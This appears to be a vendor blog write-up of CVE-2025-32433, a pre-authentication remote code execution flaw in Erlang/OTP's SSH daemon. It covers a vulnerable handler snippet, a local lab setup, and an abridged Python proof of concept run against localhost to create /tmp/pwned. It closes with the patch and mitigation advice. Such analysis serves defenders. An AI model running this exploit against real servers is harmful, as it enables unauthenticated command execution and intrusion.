CVE-2025-32433 is a critical remote code execution (RCE) vulnerability in the Erlang/OTP SSH implementation. It allows an unauthenticated attacker to execute arbitrary code on systems running vulnerable versions of Erlang’s SSH daemon. This CVE affects the default :ssh application, commonly used for embedded and test environments, particularly when configured insecurely.
What is CVE-2025-32433?
CVE-2025-32433 exploits a logic flaw in the way the Erlang SSH daemon processes certain pre-authentication messages. The flaw allows an attacker to send a specially crafted SSH_MSG_CHANNEL_REQUEST packet before authentication, tricking the server into executing arbitrary shell commands.
Impact
This vulnerability enables remote unauthenticated attackers to execute shell commands with the privileges of the Erlang process. If the SSH server is run as root (as in many embedded or lab setups), this results in full remote code execution (RCE).
Exploiting this vulnerability allows attackers to:
- Run arbitrary system commands
- Drop persistence mechanisms
- Lateral move within a network
- Extract sensitive data
Static Analysis
The root cause lies in the lack of proper authentication checks in the vulnerable ssh_channel.erl handler. The vulnerable server accepts certain SSH_MSG_CHANNEL_REQUEST messages even before authentication is completed. This bypasses the standard SSH auth pipeline and directly calls OS command execution routines via custom callbacks.
Example vulnerable code snippet:
handle_msg({ssh_cm, _ConnectionRef, {channel_request, ChannelId, _WantReply, "exec", Command}}, State) ->
%% Missing authentication check here
spawn(fun() -> os:cmd(Command) end),
{ok, State};
Lab Setup (Kali Linux) for CVE-2025-32433
This section details how to replicate the CVE-2025-32433 exploit in a controlled local lab using Kali Linux and a vulnerable Erlang/OTP build. Ensure no production systems are affected.
Prerequisites:
- Kali Linux or Debian-based Linux distribution
- Python 3.x
- Erlang/OTP version 25.3.2.19 (vulnerable)
- Git and build tools (make, gcc, wget, etc.)
Step-by-Step Instructions
1. Clone the PoC Repository
git clone https://github.com/researcher/cve-2025-32433.git
cd cve-2025-32433
2. Download and Install Vulnerable Erlang (25.3.2.19)
cd /tmp
wget https://erlang.org/download/otp_src_25.3.2.19.tar.gz
tar -xf otp_src_25.3.2.19.tar.gz
cd otp_src_25.3.2.19
./configure --prefix=$HOME/erlang_25.3.2.19
make -j$(nproc)
make install
Add Erlang to your shell PATH:
export PATH=$HOME/erlang_25.3.2.19/bin:$PATH
Verify installation:
which erl
It should output: ~/erlang_25.3.2.19/bin/erl3. Compile the Vulnerable SSH Server
cd ~/cve/cve-2025-32433
nano ssh_server.erl # use provided vulnerable code
erlc ssh_server.erl
This generates the ssh_server.beam file.
4. Start the Vulnerable SSH Daemon
erl -noshell -s ssh_server start
Expected output:
Starting vulnerable SSH server
SSH Daemon started successfully. Pid: <0.89.0>5. Run the Exploit PoC
python3 CVE-2025-32433.py –target 127.0.0.1 –port 2222 –command ‘touch /tmp/pwned’
6. Validate Exploitation
ls -l /tmp/pwned
If the file exists, RCE was successful.
Proof of Concept (PoC): CVE-2025-32433
Below is a simplified breakdown of what the PoC Python script does.
CVE-2025-32433.py – Highlights:
import socket
...
# Connect to vulnerable SSH server
sock = socket.create_connection((args.target, args.port))
# Send SSH handshake (SSH_MSG_KEXINIT) and simulate channel open
sock.sendall(ssh_handshake_payload)
sock.sendall(ssh_channel_open)
# Craft malicious SSH_MSG_CHANNEL_REQUEST with raw shell command
crafted_payload = generate_exec_payload(args.command)
sock.sendall(crafted_payload)
Key Exploit Logic:
- Sends a channel_request before authentication.
- The server skips auth checks.
- os:cmd/1 executes the attacker’s payload.
- Command is run under the current Erlang process user.
Example Output
[*] Connecting to SSH server…
[+] Received banner: SSH-2.0-Erlang/4.15.3.11
[*] Sending SSH_MSG_CHANNEL_OPEN…
[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)…[✓] Exploit sent!
Patch Diffing
A patch was committed to the OTP repo that adds an explicit authentication check before processing channel_request:
handle_msg({ssh_cm, _, {channel_request, _, _, _, _}}, State = #state{authenticated = false}) ->
{error, unauthenticated};
This effectively blocks execution unless the SSH user is authenticated.
Additional Patch Details:
- Internal message handling was updated to reject channel_request messages during unauthenticated states.
- The os:cmd/1 execution was removed from early session paths.
- OTP test cases were added to ensure rejection of pre-auth packets.
- Release notes for Erlang/OTP >= 25.3.3 highlight this fix.
Conclusion
CVE-2025-32433 is a dangerous RCE affecting improperly secured Erlang SSH daemons. Though not enabled by default in production environments, many test, IoT, and internal tools still use this stack insecurely. Immediate mitigation is to update Erlang to the patched version and never expose test SSH daemons to the internet.
For expert guidance on vulnerability management and/or penetration testing services contact SecureLayer7 to leverage tailored solutions and stay ahead of evolving security risks.
References
